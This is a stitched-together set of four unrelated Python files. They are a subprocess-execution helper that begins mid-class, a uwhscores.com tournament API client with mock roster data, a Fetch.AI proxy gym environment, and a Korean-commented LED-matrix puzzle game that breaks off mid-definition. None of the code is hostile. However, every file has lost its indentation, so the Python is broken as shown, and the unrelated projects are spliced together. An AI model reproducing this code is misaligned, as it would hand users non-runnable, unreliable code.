if as_str:
head = '\n'.join(['{}: {}'.format(h, getattr(self, h)) for h in headers])
else:
head = OrderedDict((h, getattr(self, h)) for h in headers)
return head
def get_subprocess_kwargs_dump(self):
"""gets the subprocess kwargs that were passed to the iexec, if any"""
if self.subprocess_kwargs:
kwargs_dump = '<subprocess kwargs>\n{}'.format(
'\n'.join(['{}: {}'.format(k, v) for k, v in sorted(self.subprocess_kwargs.items())]))
else:
kwargs_dump = '<no subprocess kwargs>'
return kwargs_dump
def to_dump_file(self, dump_file, dump_file_rotate=False, dump_kwargs=False):
"""Dump to dump file, handles all writing and rotating"""
return write_file(dump_file, contents=self.get_dump_data(dump_kwargs), rotate=dump_file_rotate)
def get_dump_data(self, dump_kwargs, as_str=True):
"""convenience method ot get the dump data"""
contents = OrderedDict()
contents['head'] = self.get_dump_header(as_str)
if dump_kwargs:
contents['kwargs'] = self.get_subprocess_kwargs_dump() if as_str else self.subprocess_kwargs.copy()
contents['data'] = self.contents() if as_str else {'out': self.out, 'err': self.err}
if as_str:
return '\n\n'.join(contents.values())
return contents
def append_output(self, log_id=None):
"""returns a string representation of the object with extra newlines to be appended to for logging
:param log_id:
"""
if log_id is not None:
return '{}: {}\n\n'.format(log_id, self.__str__())
return '{}\n\n'.format(self.__str__())
@property
def out_string(self):
if not self.__out:
self.__out = ''.join(self.out)
return self.__out
@property
def err_string(self):
if not self.__err:
self.__err = ''.join(self.err)
return self.__err
@property
def bad_rc(self):
return self.rc != 0
@property
def good_rc(self):
return not self.bad_rc
@property
def bad(self):
return self.bad_rc or self.err_string
@property
def good(self):
return not self.bad
def __repr__(self):
return 'ExecResult(cmd={} out={} err={} rc={} start={} time={} timeout={} kwargs={})'.format(
self.cmd, self.out, self.err, self.rc, self.start, self.time, self.timeout, self.subprocess_kwargs)
def __str__(self):
return str(self.__repr__())
def detached_iexec(cmd, **kwargs):
"""
Multiprocess iexec, perform a command on local machine with a separate process.
Immediately finishes, and you now hold a multi-process object that you can query and use to wait
once complete you can access the ExecResult Object
:param cmd: the command
:param kwargs: any kwargs
:return: MultiProcess Object to query until you get an ExecResult Object
"""
entity = 'mpiexec.{}'.format(next(MultiProcess.counter))
if kwargs.get('pickle_result', False):
pickle_file = os.path.join(get_tmp_dir(use_logging=False), entity)
kwargs['pickle_result'] = pickle_file
mp = MultiProcess(entity, iexec, [cmd], kwargs)
mp.start()
return mp
def mpiexec(cmd, **kwargs):
"""
Multiprocess iexec, perform a command on local machine with a separate process.
:param cmd: the command
:param kwargs: any kwargs
:return: ExecResult Object
"""
entity = 'mpiexec.{}'.format(next(MultiProcess.counter))
pickle_file = os.path.join(get_tmp_dir(use_logging=False), entity)
kwargs['pickle_result'] = pickle_file
mp = MultiProcess(entity, iexec, [cmd], kwargs)
mp.go()
with open(pickle_file, 'rb') as f:
return pickle.load(f)
def iexec(cmd, **kwargs):
"""
Perform a command on local machine with subprocess.Popen
contains many conveniences and logging capabilities
returns an ExecResult object which also contains many conveniences
:param cmd: the command
:param kwargs: any kwargs
:return: ExecResult Object
"""
show_log = kwargs.pop('show_log', True)
to_console = kwargs.pop('to_console', True)
print_to_console = kwargs.pop('print_to_console', False)
redirect_output = kwargs.pop('redirect_output', False)
redirect_file_name = kwargs.pop('redirect_file_name', None)
log_as_debug = kwargs.pop('log_as_debug', False)
log_as_trace = kwargs.pop('log_as_trace', False)
log_as_level = kwargs.pop('log_as_level', None)
pickle_result = kwargs.pop('pickle_result', '')
dump_file = kwargs.pop('dump_file', None)
trace_file = kwargs.pop('trace_file', None)
timeout = kwargs.pop('timeout', 0)
dump_file_rotate = kwargs.pop('dump_file_rotate', False)
alt_out = kwargs.pop('alt_out', None)
alt_err = kwargs.pop('alt_err', alt_out)
iexec_communicate = kwargs.pop('iexec_communicate', None)
iexec_communicate_input = kwargs.pop('iexec_communicate_input', None)
dump_kwargs = kwargs.pop('dump_kwargs', False)
text_mode = kwargs.pop('text_mode', True)
if not isinstance(cmd, str):
cmd = subprocess.list2cmdline(cmd)
if redirect_output and running_on_windows:
if redirect_file_name is None:
redirect_file = tempfile.NamedTemporaryFile(
suffix=".txt",
prefix="gstmp.{}.redirect.".format(get_datestring()),
dir=ir_artifact_dir,
delete=False
)
# closing the file, since we just need its name and it must be closed before using redirect the output
redirect_file.close()
redirect_file_name = redirect_file.name
cmd += ' > {} 2>&1'.format(redirect_file_name)
if print_to_console:
print(cmd)
if show_log:
msg = 'exec: {}'.format(cmd)
if log_as_level:
get_log_func(log_as_level)(msg)
elif log_as_trace:
log.trace(msg)
elif log_as_debug:
log.debug(msg)
else:
log.info(msg)
pkwargs = {'shell': True, 'stdout': subprocess.PIPE, 'stderr': subprocess.PIPE, 'text': text_mode}
subprocess_kwargs = {}
for arg in SUBPROCESS_KWARGS:
if arg in kwargs and arg not in pkwargs:
pkwargs[arg] = kwargs[arg] # kwargs to actually pass to the subprocess
subprocess_kwargs[arg] = kwargs[arg] # the kwargs the user supplied
stdout = []
stderr = []
ordered_out = []
start_time = time.time()
proc = subprocess.Popen(args=cmd, **pkwargs)
def _write_to_stdout(line):
if to_console:
sys.stdout.write(line)
if print_to_console:
print(line)
if alt_out is not None and callable(alt_out):
alt_out(contents=line)
stdout.append(line)
ordered_out.append(line)
def _write_to_stderr(line):
if to_console:
sys.stderr.write(line)
if print_to_console:
print(line)
if alt_err is not None and callable(alt_err):
alt_err(contents=line)
stderr.append(line)
ordered_out.append(line)
if running_on_windows:
if iexec_communicate:
stdout_buffer, stderr_buffer = proc.communicate(iexec_communicate_input)
if redirect_output:
stdout_buffer = read_file(redirect_file_name)
for stdout_line in stdout_buffer:
_write_to_stdout(stdout_line)
for stderr_line in stderr_buffer:
_write_to_stderr(stderr_line)
rc = proc.wait()
else:
def _enqueue_stream(stream, queue):
for line in iter(stream.readline, b''):
queue.put(line)
stream.close()
qo = Queue()
to = Thread(target=_enqueue_stream, args=(proc.stdout, qo))
to.daemon = True # thread dies with the program
to.start()
qe = Queue()
te = Thread(target=_enqueue_stream, args=(proc.stderr, qe))
te.daemon = True # thread dies with the program
te.start()
while True:
try:
stdout_line = qo.get_nowait() # or q.get(timeout=.1)
except Empty:
pass
else:
_write_to_stdout(stdout_line)
sys.stdout.flush()
try:
stderr_line = qe.get_nowait() # or q.get(timeout=.1)
except Empty:
pass
else:
_write_to_stderr(stderr_line)
sys.stderr.flush()
rc = proc.poll()
if rc is not None:
# finished proc, read all the rest of the lines from the buffer
try:
while True:
stdout_line = qo.get_nowait() # or q.get(timeout=.1)
_write_to_stdout(stdout_line)
sys.stdout.flush()
except Empty:
pass
try:
while True:
stderr_line = qe.get_nowait() # or q.get(timeout=.1)
_write_to_stderr(stderr_line)
sys.stderr.flush()
except Empty:
pass
if redirect_output:
stdout_buffer = read_file(redirect_file_name)
for stdout_line in stdout_buffer:
_write_to_stdout(stdout_line)
break
else:
reads = [proc.stdout.fileno(), proc.stderr.fileno()]
while True:
ret = select.select(reads, [], [])
for fd in ret[0]:
if fd == proc.stdout.fileno():
stdout_line = proc.stdout.readline()
_write_to_stdout(stdout_line)
if fd == proc.stderr.fileno():
stderr_line = proc.stderr.readline()
_write_to_stderr(stderr_line)
rc = proc.poll()
if rc is not None:
# finished proc, read all the rest of the lines from the buffer
stdout_buffer = proc.stdout.readlines()
for stdout_line in stdout_buffer:
_write_to_stdout(stdout_line)
stderr_buffer = proc.stderr.readlines()
for stderr_line in stderr_buffer:
_write_to_stderr(stderr_line)
break
if timeout and time.time() - start_time > timeout:
raise RuntimeError('Timeout executing cmd on linux')
time_taken = time.time() - start_time
result = ExecResult(stdout, stderr, rc, time_taken, cmd, ordered_out, start_time, timeout, subprocess_kwargs)
if dump_file:
result.to_dump_file(dump_file, dump_file_rotate, dump_kwargs=dump_kwargs)
if trace_file:
write_file(trace_file, contents=result.append_output(), filemode='a')
if pickle_result:
with open(pickle_result, 'wb') as f:
pickle.dump(result, f, protocol=1)
return result
__all__ = [
'iexec', 'mpiexec', 'detached_iexec', 'ExecResult'
]
|
uwhscores_comms.py
|
import requests
import threading
from functools import lru_cache
class UWHScores(object):
def __init__(self, base_address='https://uwhscores.com/api/v1/', mock=False):
self._base_address = base_address
self._mock = mock
self._fail_handler = lambda x : print(x)
def login(self, username, password):
self._username = username
self._password = password
def get_tournament_list(self, callback):
def success(reply):
json = reply.json()
return callback(json['tournaments'])
self._async_request('get', self._base_address + 'tournaments',
callback=success)
def get_tournament(self, tid, callback):
if tid is None:
return
def success(reply):
json = reply.json()
return callback(json['tournament'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid),
callback=success)
def get_game_list(self, tid, callback):
if tid is None:
return
def success(reply):
json = reply.json()
return callback(json['games'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/games',
callback=success)
def get_game(self, tid, gid, callback):
if tid is None or gid is None:
return
def success(reply):
json = reply.json()
return callback(json['game'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/games/' + str(gid),
callback=success)
def get_team_list(self, tid, callback):
if tid is None:
return
def success(reply):
json = reply.json()
return callback(json['teams'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/teams',
callback=success)
def get_team(self, tid, team_id, callback):
if tid is None or team_id is None:
return
def success(reply):
json = reply.json()
return callback(json['team'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/teams/' + str(team_id),
callback=success)
def post_score(self, tid, gid, score_b, score_w, black_id, white_id):
def login_success(response):
token = response.json()['token']
score = {
"game_score": {
'tid': tid,
'gid': gid,
'score_w': score_w,
'score_b': score_b,
'black_id': black_id,
'white_id': white_id
}
}
self._async_request('post', self._base_address + 'tournaments/' + str(tid) + '/games/' + str(gid),
json=score, callback=lambda _:None, auth=(token, ''))
self._async_request('get', self._base_address + 'login',
auth=(self._username, self._password),
callback=login_success)
def get_team_flag(self, tid, team_id, callback):
if tid is None or team_id is None:
return
def success(team):
flag_url = team['flag_url']
if not flag_url:
callback(None)
return
@lru_cache(maxsize=16)
def fetch_flag(url):
callback(requests.get(url, stream=True).raw)
fetch_flag(flag_url)
self.get_team(tid, team_id, success)
#def get_standings(self, tid, callback):
# def success(reply):
# json = reply.json()
# return callback(json['standings'])
#
# self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/standings',
# callback=success)
def get_roster(self, tid, team_id, callback):
if tid is None or team_id is None:
return
def success(reply):
json = reply.json()
callback(json['team']['roster'])
self._async_request('get', self._base_address + 'tournaments/' + str(tid) + '/teams/' + str(team_id),
callback=success)
def _mock_data(self):
return { 'api' : { 'v1' : {
'tournaments' : {
0 : { 'tid' : 0 },
1 : { 'tid' : 1 },
2 : { 'tid' : 2 },
3 : { 'tid' : 3 },
4 : { 'tid' : 4 },
5 : { 'tid' : 5 },
6 : { 'tid' : 6 },
7 : { 'tid' : 7 },
8 : { 'tid' : 8 },
9 : { 'tid' : 9 },
10 : { 'tid' : 10 },
11 : { 'tid' : 11 },
12 : {
'mock_name' : 'tournament',
'tid' : 12,
'standings' : {
0 : {
'team' : 'Team Sexy',
'team_id' : 2,
'stats' : {
'points' : 27
},
},
2 : {
'team' : 'UF',
},
4 : {
'team' : 'Hampton'
},
6 : {
'team' : 'Swordfish'
},
7 : {
'team' : 'George Mason'
}
}
},
13 : { 'tid' : 13 },
14 : {
'mock_name' : 'tournament',
'tid' : 14,
'name' : 'Battle@Altitude 2018',
'location' : 'Denver, CO',
'is_active' : False,
'games' : {
1 : {
'black' : 'LA',
'black_id' : 1,
'pool' : '1',
},
4 : {
'white' : 'Seattle',
'white_id' : 6,
'start_time' : '2018-01-27T09:02:00',
},
6 : {
'black' : 'U19 Girls',
'black_id' : 14,
'day' : 'Sat',
'start_time' : '2018-01-27T09:34:00',
'white' : 'US Elite Women',
'white_id' : 17,
}
},
'teams' : {
1 : { 'name' : 'LA' },
3 : { 'name' : 'Rainbow Raptors' },
7 : { 'name' : 'Cupcake Crocodiles' },
11 : { 'name' : 'Chicago' },
13 : { 'name' : 'Colorado B' },
17 : { 'name' : 'US Elite Women' },
}
},
15 : {
'mock_name' : 'tournament',
'tid' : 15,
'name' : '2018 Worlds Mockup',
'location' : 'Quebec City, Canada',
'is_active' : True,
'games' : {
1 : {
'mock_name' : 'game',
'black' : 'Argentina',
'black_id' : 1,
'pool' : 1,
'white' : 'Australia',
'white_id' : 2,
'start_time' : '2018-07-18T07:40:00'
},
2 : {
'mock_name' : 'game',
'black' : 'USA',
'black_id' : 3,
'pool' : 2,
'white' : 'Columbia',
'white_id' : 4,
'start_time' : '2018-07-18T07:40:00'
}
},
'teams' : {
1 : {
'mock_name' : 'team',
'name' : 'Argentina Masters Men',
'team_id' : 1,
'roster' : {
1 : {
'player_id' : 1,
'name' : 'Schmoe, Joe',
},
2 : {
'player_id' : 2,
'name' : 'Doe, John'
},
3 : {
'player_id' : 3,
'name' : 'Bobby, Ricky'
},
4 : {
'player_id' : 4,
'name' : 'Georgeson, George'
},
5 : {
'player_id' : 5,
'name' : 'Steveson, Steve'
},
6 : {
'player_id' : 6,
'name' : 'Justinson, Justin'
},
7 : {
'player_id' : 7,
'name' : 'Pauly, Paul'
},
8 : {
'player_id' : 8,
'name' : 'Everett, Earnest'
},
9 : {
'player_id' : 9,
'name' : 'Clumboldt, Cletus'
},
10 : {
'player_id' : 10,
'name' : 'Miller, Milhouse'
},
11 : {
'player_id' : 11,
'name' : 'Thompson, Tucker'
},
12 : {
'player_id' : 12,
'name' : 'Richardson, Rich'
}
}
},
2 : {
'mock_name' : 'team',
'name' : 'Australia Masters Men',
'team_id' : 2,
'roster' : {
1 : {
'player_id' : 1,
'name' : 'Speedwagon, Mario',
},
2 : {
'player_id' : 2,
'name' : 'Romer, Robby'
},
3 : {
'player_id' : 3,
'name' : 'Riker, Randolph'
},
4 : {
'player_id' : 4,
'name' : 'Tomlin, Teddy'
},
5 : {
'player_id' : 5,
'name' : 'Wolf, Warren'
},
6 : {
'player_id' : 6,
'name' : 'Pollard, Phillip'
},
7 : {
'player_id' : 7,
'name' : 'Bavaro, Buster'
},
8 : {
'player_id' : 8,
'name' : 'James, Joshua'
},
9 : {
'player_id' : 9,
'name' : 'Shin, Stewart'
},
10 : {
'player_id' : 10,
'name' : 'Hume, Huey'
},
11 : {
'player_id' : 11,
'name' : 'Vos, Valentine'
},
12 : {
'player_id' : 12,
'name' : 'Newburn, Noel'
}
}
},
3 : { 'name' : 'USA Masters Men', 'team_id' : 3 },
4 : { 'name' : 'Columbia Masters Men', 'team_id' : 4 },
}
}
}
}}}
def _mock_api(self, endpoint, cb_success, cb_fail):
import urllib.parse
import posixpath
def path_parse(path_string):
result = []
tmp = posixpath.normpath(path_string)
while tmp != "/":
(tmp, item) = posixpath.split(tmp)
result.insert(0, item)
return result
url_parsed = urllib.parse.urlparse( endpoint )
path_parsed = path_parse(urllib.parse.unquote(url_parsed.path))
try:
mock = self._mock_data()
for idx, item in enumerate(path_parsed):
try:
item = int(item)
except ValueError:
pass
mock = mock[item]
class Wrap(object):
def __init__(self, wrap):
self._wrap = wrap
def json(self):
return { self._wrap['mock_name'] : self._wrap }
cb_success(Wrap(mock))
except KeyError as e:
print('mock lookup fail for: ' + endpoint)
cb_fail(e)
def set_fail_handler(self, callback):
self._fail_handler = callback
def _async_request(self, method, *args, callback,
callback_fail=None,
timeout=5, **kwargs):
method = {
'get' : requests.get,
'post' : requests.post,
'put' : requests.put,
'patch' : requests.patch,
'delete' : requests.delete,
'options' : requests.options,
'head' : requests.head
}[method.lower()]
callback_fail = callback_fail or self._fail_handler
def wrap_method(*args, **kwargs):
try:
method(*args, **kwargs)
except requests.exceptions.ConnectionError as e:
callback_fail(e)
except Exception as e:
callback_fail(e)
parent_args = args
if callback:
def callback_with_args(response, *args, **kwargs):
try:
callback(response)
except Exception as e:
callback_fail((parent_args[0], e))
kwargs['hooks'] = {'response': callback_with_args}
kwargs['timeout'] = timeout
if self._mock:
self._mock_api(args[0], callback, callback_fail)
else:
thread = threading.Thread(target=wrap_method, args=args, kwargs=kwargs)
thread.start()
|
env.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This contains the proxy gym environment."""
import sys
import time
from queue import Queue
from threading import Thread
from typing import Any, Tuple, cast
import gym
from aea.configurations.base import PublicId
from aea.helpers.base import locate
from aea.mail.base import Envelope
from aea.protocols.base import Message
sys.modules["packages.fetchai.connections.gym"] = locate(
"packages.fetchai.connections.gym"
)
sys.modules["packages.fetchai.protocols.gym"] = locate("packages.fetchai.protocols.gym")
from packages.fetchai.protocols.gym.message import GymMessage # noqa: E402
from packages.fetchai.protocols.gym.serialization import GymSerializer # noqa: E402
from .agent import ProxyAgent # noqa: E402
Action = Any
Observation = Any
Reward = float
Done = bool
Info = dict
Feedback = Tuple[Observation, Reward, Done, Info]
DEFAULT_GYM = "gym"
class ProxyEnv(gym.Env):
"""This class implements a proxy gym environment."""
def __init__(self, gym_env: gym.Env) -> None:
"""
Instantiate the proxy environment.
:param gym_env: gym environment
:return: None
"""
super().__init__()
self._queue = Queue()
self._action_counter = 0
self._agent = ProxyAgent(
name="proxy", gym_env=gym_env, proxy_env_queue=self._queue
)
self._agent_address = self._agent.identity.address
self._agent_thread = Thread(target=self._agent.start)
def step(self, action: Action) -> Feedback:
"""
Run one time-step of the environment's dynamics.
Mirrors the standard 'step' method of a gym environment.
- The action is given to _encode_action, which does the necessary conversion to an envelope.
- The envelope is given to the outbox of the proxy agent.
- The method blocks until the _queue returns an envelope.
- The envelope is decoded with _decode_percept to a message.
- The message is converted into the standard observation, reward, done and info via _message_to_percept
:param action: the action sent to the step method (e.g. the output of an RL algorithm)
:return: a Tuple containing the Feedback of Observation, Reward, Done and Info
"""
self._action_counter += 1
step_id = self._action_counter
out_envelope = self._encode_action(action, step_id)
# Send the envelope via the proxy agent and to the environment
self._agent.outbox.put(out_envelope)
# Wait (blocking!) for the response envelope from the environment
in_envelope = self._queue.get(block=True, timeout=None) # type: Envelope
msg = self._decode_percept(in_envelope, step_id)
observation, reward, done, info = self._message_to_percept(msg)
return observation, reward, done, info
def render(self, mode="human") -> None:
"""
Render the environment.
:return: None
"""
# TODO: adapt this line to the new APIs. We no longer have a mailbox.
self._agent.mailbox._connection.channel.gym_env.render(mode)
def reset(self) -> None:
"""
Reset the environment.
:return: None
"""
if not self._agent.multiplexer.is_connected:
self._connect()
gym_msg = GymMessage(performative=GymMessage.Performative.RESET)
gym_bytes = GymSerializer().encode(gym_msg)
envelope = Envelope(
to=DEFAULT_GYM,
sender=self._agent_address,
protocol_id=GymMessage.protocol_id,
message=gym_bytes,
)
self._agent.outbox.put(envelope)
def close(self) -> None:
"""
Close the environment.
:return: None
"""
gym_msg = GymMessage(performative=GymMessage.Performative.CLOSE)
gym_bytes = GymSerializer().encode(gym_msg)
envelope = Envelope(
to=DEFAULT_GYM,
sender=self._agent_address,
protocol_id=GymMessage.protocol_id,
message=gym_bytes,
)
self._agent.outbox.put(envelope)
self._disconnect()
def _connect(self):
"""
Connect to this proxy environment. It starts a proxy agent that can interact with the framework.
:return: None
"""
assert not self._agent_thread.is_alive(), "Agent already running."
self._agent_thread.start()
while not self._agent.multiplexer.is_connected:
time.sleep(0.1)
def _disconnect(self):
"""
Disconnect from this proxy environment. It stops the proxy agent and kills its thread.
:return: None
"""
self._agent.stop()
self._agent_thread.join()
self._agent_thread = None
def _encode_action(self, action: Action, step_id: int) -> Envelope:
"""
Encode the 'action' sent to the step function as one or several envelopes.
:param action: the action that is the output of an RL algorithm.
:param step_id: the step id
:return: an envelope
"""
gym_msg = GymMessage(
performative=GymMessage.Performative.ACT, action=action, step_id=step_id
)
gym_bytes = GymSerializer().encode(gym_msg)
envelope = Envelope(
to=DEFAULT_GYM,
sender=self._agent_address,
protocol_id=GymMessage.protocol_id,
message=gym_bytes,
)
return envelope
def _decode_percept(self, envelope: Envelope, expected_step_id: int) -> Message:
"""
Receive the response from the gym environment in the form of an envelope and decode it.
The response is a PERCEPT message containing the usual 'observation', 'reward', 'done', 'info' parameters.
:param expected_step_id: the expected step id
:return: a message received as a response to the action performed in apply_action.
"""
if envelope is not None:
if envelope.protocol_id == PublicId.from_str("fetchai/gym:0.1.0"):
gym_msg = GymSerializer().decode(envelope.message)
gym_msg_performative = GymMessage.Performative(
gym_msg.get("performative")
)
gym_msg_step_id = gym_msg.get("step_id")
if (
gym_msg_performative == GymMessage.Performative.PERCEPT
and gym_msg_step_id == expected_step_id
):
return gym_msg
else:
raise ValueError(
"Unexpected performative or no step_id: {}".format(
gym_msg_performative
)
)
else:
raise ValueError("Unknown protocol_id: {}".format(envelope.protocol_id))
else:
raise ValueError("Missing envelope.")
def _message_to_percept(self, message: Message) -> Feedback:
"""
Transform the message received from the gym environment into observation, reward, done, info.
:param: the message received as a response to the action performed in apply_action.
:return: the standard feedback (observation, reward, done, info) of a gym environment.
"""
observation = cast(Any, message.get("observation"))
reward = cast(float, message.get("reward"))
done = cast(bool, message.get("done"))
info = cast(dict, message.get("info"))
return observation, reward, done, info
|
gallery.py
|
from matrix import*
import random
import time
from original import draw_matrix
import LED_display as LMD
import threading
from score import ScoreBlk
from score import Score
def LED_init(): ## LED에 불빛이 들어오게 하는 함수
thread=threading.Thread(target=LMD.main, args=())
thread.setDaemon(True)
thread.start()
return
def gallery_mode_exe(): ## 갤러리 모드 게임을 실행하는 함수
arrayBlk=[[2,2,2,2],[2,2,2,2],[2,2,2,2],[2,2,2,2]] ## 사용자가 조종하는 블록
currBlk=Matrix(arrayBlk) ## 행렬 형태로 변환
count=0 ## 그림 5개를 모두 맞췄는지 카운팅하기 위한 변수
Q=0 ## 게임을 중도포기 했을 때 바로 게임을 종료시키기 위해 사용되는 변수
i=0 ## 게임을 성공하거나 실패했을 때 게임을 계속 이어가거나 종료시키기 위해 사용되는 변수
score=0 ## 사용자의 게임 스코어를 매기기 위해 사용되는 변수
while True: ##게임을 종료할 때까지 무한 루프
if Q==1:
print("게임을 중도포기하셨습니다. 게임을 종료합니다.")
break ## 사용자가 중도포기하여 Q값이 1이 되면 무한루프 탈출 및 게임 종료
if count==5:
print("갤러리 모드를 성공하셨습니다. 게임을 종료합니다.")
break ## 그림 5종류를 모두 성공하여 count값이 5가 되면 무한루프 탈출 및 게임 종료
if (i==1)or(i==2): ## 게임을 성공하거나 실패한 경우(중도포기 제외) 점수 출력
score=int(score)
f = open("갤러리1등.txt", 'r')
file = f.read()
f.close()
list = file.splitlines() ## 갤러리1등 텍스트 파일에 저장되어있는 기존 1등의 점수를 읽어들여 list에 저장
for line in list:
print("1등의 기록 : ", line)
line=int(line) ## 점수를 정수 형태로 받아들임
draw_matrix(Score(line)) ## Score 함수를 호출해 해당 점수가 적힌 스크린을 리턴받고 draw_matrix 함수를 호출하여
time.sleep(2) ## 기존 1등 점수 led matrix에 2초동안 출력
print(player,"의 기록: ",score)
draw_matrix(Score(score))
time.sleep(2) ## 동일한 방식으로 현재 사용자 점수 2초동안 출력
if line<score:
print("축하드립니다. 신기록을 세우셨군요!!")
f= open("갤러리1등.txt", 'w')
line = f.write(str(score)) ## 현 사용자가 신기록을 달성할경우 현 사용자의 점수를 갤러리1등 텍스트 파일에 1등의 점수로 새로 갱신
print("새로운 1등 기록 : ",score) ## 현재 사용자가 달성한 신기록 출력
f.close()
if i==1: ## 실패했지만 사용자가 게임을 다시 시작하겠다고 한 경우
print("게임을 다시 시작합니다.")
elif i==2: ## 실패했지만 사용자가 게임을 종료하겠다고 한 경우
print("게임을 종료합니다.")
break ## 무한루프 탈출 및 게임 종료
## output
print("환영합니다. 게임을 시작합니다.") ## 게임 시작
player = input("플레이어의 이름을 입력하세요: ") ## 사용자 이름 입력받음
## 갤러리 속 그림의 종류 수박,아이스크림,딸기,하트,강아지 총 5가지, 각 그림은 조각 조각 나뉘어져 조각 하나씩 문제로 출제됨
gallery = [['a','b','c','d'],['e','f','g','h'],['i','j'],['k','l'],['m','n','o','p','q','r']] ## a,b,c,d같은 요소는 수박 그림을 4등분한 각각의 그림 조각 파일을 의미
random.shuffle(gallery) ## 갤러리 리스트 속 요소들의 순서 무작위로 변경
for picture in gallery: ## 무작위로 변경된 순서대로, 즉 랜덤으로 그림 하나씩 뽑기
count = count+1 ## 뽑힌 그림 하나당 count 값이 1씩증가, count가 5가 되면 모든 그림이 출제된 것임
random.shuffle(picture) ## 뽑힌 그림 리스트 속 그림 조각들의 순서 무작위로 변경
for order in picture: ## 무작위로 변경된 순서대로, 즉 랜덤으로 그림 조각 하나씩 뽑혀 문제로 출제
if order == 'a': ## 문제로 출제될 그림 조각이 a일 경우, 수박의 첫번째 그림 조각이므로
from watermelon import QarrayScreen1 as QarrayScreen ## watermelon 파일에서 문제로 출제할 QarrayScreen1 이라는 수박 그림 조각을 불러옴
QiScreen=Matrix(QarrayScreen) ## matrix 함수를 통해 행렬 형태로 바꾸어 QiScreen에 저장
if order == 'b':
from watermelon import QarrayScreen2 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'c':
from watermelon import QarrayScreen3 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'd':
from watermelon import QarrayScreen4 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'e':
from icecream import QarrayScreen5 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'f':
from icecream import QarrayScreen6 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'g':
from icecream import QarrayScreen7 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'h':
from icecream import QarrayScreen8 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'i':
from strawberry import QarrayScreen9 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'j':
from strawberry import QarrayScreen10 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'k':
from heart import QarrayScreen11 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'l':
from heart import QarrayScreen12 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'm':
from dog import QarrayScreen13 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'n':
from dog import QarrayScreen14 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'o':
from dog import QarrayScreen15 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'p':
from dog import QarrayScreen16 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'q':
from dog import QarrayScreen17 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'r':
from dog import QarrayScreen18 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
QoScreen=Matrix(QiScreen) ## matrix 함수를 통해 QiScreen을 행렬 형태로 바꾸어 QoScreen에 저장
LED_init() ## LED에 불 들어오게 하는 함수 호출
draw_matrix(QoScreen); print() ## draw_matrix 함수를 호출하여 QoScreen을 출력, led matrix에 불이 들어오며 문제 화면이 출력됨
time.sleep(10) ## 10초동안 문제화면 출력
## input
AiScreenDy=12
AiScreenDx=28
AiScreenDw=2
top=2
left=2
AarrayScreen=[
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1] ] #사용자의 답을 입력받을 AarrayScreen
AiScreen=Matrix(AarrayScreen)
